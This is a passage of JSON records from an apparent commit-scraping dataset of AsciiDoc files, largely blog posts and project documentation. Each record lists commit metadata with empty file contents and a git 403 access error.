lasticsearch,wenpos\/elasticsearch,winstonewert\/elasticsearch,shreejay\/elasticsearch,scottsom\/elasticsearch,shreejay\/elasticsearch,gingerwizard\/elasticsearch,mohit\/elasticsearch,scottsom\/elasticsearch,alexshadow007\/elasticsearch,lks21c\/elasticsearch,kalimatas\/elasticsearch,gfyoung\/elasticsearch,s1monw\/elasticsearch,umeshdangat\/elasticsearch,gfyoung\/elasticsearch,alexshadow007\/elasticsearch,nezirus\/elasticsearch,mjason3\/elasticsearch,ThiagoGarciaAlves\/elasticsearch","old_file":"docs\/reference\/cat\/shards.asciidoc","new_file":"docs\/reference\/cat\/shards.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2be0347ba2b8f0576a8a69ba300dc3d44359e9a8","subject":"turtlebot3","message":"turtlebot3\n","repos":"seyfullahuysal\/PCL-ROS,seyfullahuysal\/PCL-ROS,seyfullahuysal\/PCL-ROS,seyfullahuysal\/PCL-ROS,seyfullahuysal\/PCL-ROS","old_file":"Ros Gazebo\/README.adoc","new_file":"Ros Gazebo\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/seyfullahuysal\/PCL-ROS.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"418489a834238af4cc7c892fc796099fd178c5f3","subject":"Update 2015-07-29-A-little-PHP-function-for-getting-signed-integers-from-a-string.adoc","message":"Update 2015-07-29-A-little-PHP-function-for-getting-signed-integers-from-a-string.adoc","repos":"Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io","old_file":"_posts\/2015-07-29-A-little-PHP-function-for-getting-signed-integers-from-a-string.adoc","new_file":"_posts\/2015-07-29-A-little-PHP-function-for-getting-signed-integers-from-a-string.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ugotsta\/Ugotsta.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0d42603ab7574efb2d1d8ba8acef839e5a490d7","subject":"Update 2016-01-04-Java-Annotations.adoc","message":"Update 
2016-01-04-Java-Annotations.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2016-01-04-Java-Annotations.adoc","new_file":"_posts\/2016-01-04-Java-Annotations.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3502c76ea6d2d23a03fc552b001e7c2ca31d3965","subject":"Update 2019-01-31-My-English-Title.adoc","message":"Update 2019-01-31-My-English-Title.adoc","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2019-01-31-My-English-Title.adoc","new_file":"_posts\/2019-01-31-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ebb12315f1ef99d774876a8748102c5782af6e1","subject":"Update 2015-03-11-Iron-Viking.adoc","message":"Update 2015-03-11-Iron-Viking.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2015-03-11-Iron-Viking.adoc","new_file":"_posts\/2015-03-11-Iron-Viking.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f4cd9dde5770829d84099733f6e4dabaa900fcdc","subject":"Update 2016-07-15-Hello-World.adoc","message":"Update 2016-07-15-Hello-World.adoc","repos":"willnewby\/willnewby.github.io,willnewby\/willnewby.github.io,willnewby\/willnewby.github.io,willnewby\/willnewby.github.io","old_file":"_posts\/2016-07-15-Hello-World.adoc","new_file":"_posts\/2016-07-15-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/willnewby\/willnewby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c4d86968ef8a3463ad5fbef6533b5eaed037cca","subject":"Create 2016-08-23-MSVC-P40dll.adoc","message":"Create 2016-08-23-MSVC-P40dll.adoc","repos":"aspick\/hubpress.io,aspick\/hubpress.io,aspick\/hubpress.io,aspick\/hubpress.io","old_file":"_posts\/2016-08-23-MSVC-P40dll.adoc","new_file":"_posts\/2016-08-23-MSVC-P40dll.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aspick\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"26c83f4c2dd20f67908f5121ee1940b4bb7660be","subject":"Update 2016-09-02-Swift-Tuple.adoc","message":"Update 2016-09-02-Swift-Tuple.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"d7f39ed93af98e7a1594ac1134c328f5c25c6301","subject":"Init. How to deploy","message":"Init. How to deploy\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Maven central.adoc","new_file":"Maven central.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ac5942a9b797119b669d5700aad998277a43f6f6","subject":"clbin dump of lcture notes from tonights quick 10~ish minute TCP rtt overview","message":"clbin dump of lcture notes from tonights quick 10~ish minute TCP rtt overview\n","repos":"jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405","old_file":"lecture10_20171030.adoc","new_file":"lecture10_20171030.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jzacsh\/netwtcpip-cmp405.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d41709fb7b62ad3131315e4b3fd8acc8ae9721e2","subject":"Update Kaui_Guide_Draft (4) (1).adoc","message":"Update Kaui_Guide_Draft (4) (1).adoc\n","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/kaui\/Kaui_Guide_Draft (4) (1).adoc","new_file":"userguide\/kaui\/Kaui_Guide_Draft (4) (1).adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6646bcb06581042f66bf72722954330145074b19","subject":"[DOCS] Fix list formatting in TESTING.asciidoc (#33889)","message":"[DOCS] Fix list formatting in TESTING.asciidoc (#33889)\n\nFix the steps listed in `Testing packaging` to\r\n```\r\n1. step1\r\n2. step2\r\n--------------------------------------\r\nvagrant plugin install vagrant-cachier\r\n--------------------------------------\r\n3. step3\r\n```\r\ninstead of\r\n```\r\ninstead of:\r\n1. step1\r\n2. step2\r\n--------------------------------------\r\nvagrant plugin install vagrant-cachier\r\n--------------------------------------\r\n1. 
step3\r\n```","repos":"scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch","old_file":"TESTING.asciidoc","new_file":"TESTING.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"49289fb8d7d95cc0bfc96eb871a70b327b71c4fe","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/09\/16\/deref.adoc","new_file":"content\/news\/2022\/09\/16\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"0b41b3ace23a7f96dcccee28afd8af0a2f102231","subject":"Update 2016-6-27-json-decode-json-encode.adoc","message":"Update 2016-6-27-json-decode-json-encode.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-27-json-decode-json-encode.adoc","new_file":"_posts\/2016-6-27-json-decode-json-encode.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a9727dc004fb7669487e9f412b64176191f5ed5b","subject":"Add Classloader description doc","message":"Add Classloader description doc\n","repos":"ivargrimstad\/snoopee,ivargrimstad\/snoop,ivargrimstad\/snoop,ivargrimstad\/snoopee,ivargrimstad\/snoop,ivargrimstad\/snoopee","old_file":"classloader-issue.adoc","new_file":"classloader-issue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ivargrimstad\/snoopee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7fe8bf308057918e666e3890dfeada5c4370b44e","subject":"[DOCS] Fixed broken link to Logstash monitoring","message":"[DOCS] Fixed broken link to Logstash monitoring\n\nOriginal commit: 
elastic\/x-pack-elasticsearch@1f64dd663736f41881d37d5a4ba62d7fb9eead9f\n","repos":"nknize\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch","old_file":"docs\/en\/settings\/monitoring-settings.asciidoc","new_file":"docs\/en\/settings\/monitoring-settings.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"78604ac483278e1b949225be7d5e085d1c071bfb","subject":"Documented minimal set of OSGi bundles (#9489)","message":"Documented minimal set of OSGi bundles (#9489)\n\n","repos":"Darsstar\/framework,asashour\/framework,Darsstar\/framework,mstahv\/framework,Darsstar\/framework,mstahv\/framework,asashour\/framework,mstahv\/framework,mstahv\/framework,asashour\/framework,asashour\/framework,asashour\/framework,Darsstar\/framework,mstahv\/framework,Darsstar\/framework","old_file":"documentation\/advanced\/advanced-osgi.asciidoc","new_file":"documentation\/advanced\/advanced-osgi.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mstahv\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"87ff61ae1078812e6596f571c394ec5ccd6eb480","subject":"Update 2016-11-14-Pycharm.adoc","message":"Update 2016-11-14-Pycharm.adoc","repos":"zhuo2015\/zhuo2015.github.io,zhuo2015\/zhuo2015.github.io,zhuo2015\/zhuo2015.github.io,zhuo2015\/zhuo2015.github.io","old_file":"_posts\/2016-11-14-Pycharm.adoc","new_file":"_posts\/2016-11-14-Pycharm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/zhuo2015\/zhuo2015.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0e04c248e304dddb88aa1534e590f0abeb549ae0","subject":"Update 2016-01-20-Indice.adoc","message":"Update 2016-01-20-Indice.adoc","repos":"iesextremadura\/iesextremadura.github.io,iesextremadura\/iesextremadura.github.io,iesextremadura\/iesextremadura.github.io","old_file":"_posts\/2016-01-20-Indice.adoc","new_file":"_posts\/2016-01-20-Indice.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iesextremadura\/iesextremadura.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c35bd6d024acc05175b5406f91cfff053709867b","subject":"Update 2016-05-06-Pepper.adoc","message":"Update 2016-05-06-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-06-Pepper.adoc","new_file":"_posts\/2016-05-06-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ca35e3284ba36587c2a194d4e0aad926b069cf50","subject":"Adding tutorial for stripe integration","message":"Adding tutorial for stripe integration\n","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/stripe_plugin.adoc","new_file":"userguide\/tutorials\/stripe_plugin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fbcbea87157c81684bf4e828719edcee48ea6166","subject":"Wording","message":"Wording\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Maven\/Maven central.adoc","new_file":"Maven\/Maven central.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a20a851ca8b1165e5a63d97da2ba9133c45bdccd","subject":"Add Terminology documentation","message":"Add Terminology documentation\n","repos":"cvut\/sirius,cvut\/sirius","old_file":"docs\/terminology.adoc","new_file":"docs\/terminology.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cvut\/sirius.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a569951187562e05076ee6f6fbdd7df15198575f","subject":"docs: updated release notes for elastic\/elasticsearch#649 change","message":"docs: updated release notes for elastic\/elasticsearch#649 change\n\nOriginal commit: 
elastic\/x-pack-elasticsearch@ee5e009fd25a54662fc94da753728e00ae2346d8\n","repos":"gfyoung\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,vroyer\/elassandra,scorpionvicky\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,strapdata\/elassandra,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,strapdata\/elassandra,HonzaKral\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,strapdata\/elassandra,strapdata\/elassandra,uschindler\/elasticsearch,gfyoung\/elasticsearch,vroyer\/elassandra,HonzaKral\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,strapdata\/elassandra,robin13\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,vroyer\/elassandra,uschindler\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch","old_file":"watcher\/docs\/release-notes.asciidoc","new_file":"watcher\/docs\/release-notes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"16f84ddc4134573f50ec84e9ea2a72d53a03a167","subject":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-3.adoc","message":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-3.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-3.adoc","new_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a23e718b0c05582d04b3ab2515febf938e405ebe","subject":"Update code documentation","message":"Update code documentation\n","repos":"psprint\/zplugin,psprint\/zplugin,psprint\/zplugin","old_file":"zsdoc\/zplugin.zsh.adoc","new_file":"zsdoc\/zplugin.zsh.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/psprint\/zplugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"33fa14ff51ee683b483f1edebb189cfe84aeaa48","subject":"Update 2016-03-29-Conocido-Desconocido.adoc","message":"Update 2016-03-29-Conocido-Desconocido.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-29-Conocido-Desconocido.adoc","new_file":"_posts\/2016-03-29-Conocido-Desconocido.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ce1d30d4cf531a518569472ddf043899489ddf64","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/new_book.adoc","new_file":"content\/writings\/new_book.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"e15018d0f56b7072e5e872b1336a3e87aeb7ec25","subject":"Update 2017-08-23-githooks.adoc","message":"Update 2017-08-23-githooks.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-23-githooks.adoc","new_file":"_posts\/2017-08-23-githooks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c247d9e3eea80e2fa311ec37798274283a66dc23","subject":"Deleted _posts\/2016-11-05-About-the-Author.adoc","message":"Deleted _posts\/2016-11-05-About-the-Author.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-05-About-the-Author.adoc","new_file":"_posts\/2016-11-05-About-the-Author.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fda97a28e6f084aa9460b72f1ac996e30e2ae0d7","subject":"add docs for userProjects","message":"add docs for userProjects\n","repos":"EMBL-EBI-SUBS\/subs-api,EMBL-EBI-SUBS\/subs-api","old_file":"src\/main\/resources\/docs\/submission_api.adoc","new_file":"src\/main\/resources\/docs\/submission_api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/EMBL-EBI-SUBS\/subs-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3c5e93297005785e6675fa8ec1404921dc37709b","subject":"Update 2019-01-31-My-English-Title.adoc","message":"Update 2019-01-31-My-English-Title.adoc","repos":"akhmetgali\/hubpress.io,akhmetgali\/hubpress.io,akhmetgali\/hubpress.io,akhmetgali\/hubpress.io","old_file":"_posts\/2019-01-31-My-English-Title.adoc","new_file":"_posts\/2019-01-31-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/akhmetgali\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"00d41b902be0df65d40295b1129e068bab228565","subject":"CL note: writing to file","message":"CL note: writing to file\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} 
{"commit":"431f0b28cebfc0eae2421e807ae835a4c2829662","subject":"Update 2016-12-22-Bump-Bee-S-30A-ESC-Review.adoc","message":"Update 2016-12-22-Bump-Bee-S-30A-ESC-Review.adoc","repos":"OctavioMaia\/octaviomaia.github.io,OctavioMaia\/octaviomaia.github.io,OctavioMaia\/octaviomaia.github.io,OctavioMaia\/octaviomaia.github.io","old_file":"_posts\/2016-12-22-Bump-Bee-S-30A-ESC-Review.adoc","new_file":"_posts\/2016-12-22-Bump-Bee-S-30A-ESC-Review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OctavioMaia\/octaviomaia.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fc74d506ef41f4baed40f29152547aa8483e9a17","subject":"Update 2017-03-22-New-post-test.adoc","message":"Update 2017-03-22-New-post-test.adoc","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2017-03-22-New-post-test.adoc","new_file":"_posts\/2017-03-22-New-post-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9667b6eda833fdc7062151665a5971892b01325","subject":"Delete the file at '_posts\/2017-08-11-Intro.adoc'","message":"Delete the file at '_posts\/2017-08-11-Intro.adoc'","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-08-11-Intro.adoc","new_file":"_posts\/2017-08-11-Intro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d2a080db1568af3630c865689f2d3f0050e581bd","subject":"Update 2017-02-09-test1.adoc","message":"Update 2017-02-09-test1.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-02-09-test1.adoc","new_file":"_posts\/2017-02-09-test1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e0b3352d2cdd3ded888d0277463da7fd034a90a1","subject":"CL: Don't include linenumbers in code block","message":"CL: Don't include linenumbers in code block\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"4a75ebceed0175bacf8638dfbe83ff6480c3d8de","subject":"Worked on Jump list documentation","message":"Worked on Jump list documentation\n","repos":"libyal\/dtformats,libyal\/dtformats","old_file":"documentation\/Jump lists format.asciidoc","new_file":"documentation\/Jump lists format.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/dtformats.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"fdb04e842b9761e6569fccaf11e74c9af2d9b842","subject":"add survey news","message":"add survey news\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2020\/01\/07\/clojure-2020-survey.adoc","new_file":"content\/news\/2020\/01\/07\/clojure-2020-survey.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"de32ef820ba021f9dd80c1d56bf7a8ee83e5fb7b","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"22b3f39b8d8bf4cbb59360c84515e37dc4b849c5","subject":"Update 2016-06-27-json-decode-json-encode.adoc","message":"Update 2016-06-27-json-decode-json-encode.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-06-27-json-decode-json-encode.adoc","new_file":"_posts\/2016-06-27-json-decode-json-encode.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2faaa31c3279feecf4ba4f015caa32441bf535e3","subject":"Update 